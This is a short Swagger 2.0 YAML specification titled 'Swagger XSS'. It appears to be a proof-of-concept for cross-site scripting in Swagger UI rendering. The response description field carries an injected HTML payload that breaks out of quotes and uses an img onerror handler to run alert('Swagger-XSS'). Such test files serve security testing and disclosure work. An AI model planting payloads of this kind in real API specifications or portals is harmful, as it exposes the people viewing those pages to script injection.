 
swagger: '2.0'
info:
  title: Swagger XSS
  description: |
    Teste
paths:
  /Swagger XSS:
    get:
      responses:
        '200':
          description: No response was specified'"><p><img src=x onerror=alert('Swagger-XSS')>
      tags:
        - Swagger XSS
      operationId: findAccounts
      summary: Finds all accounts
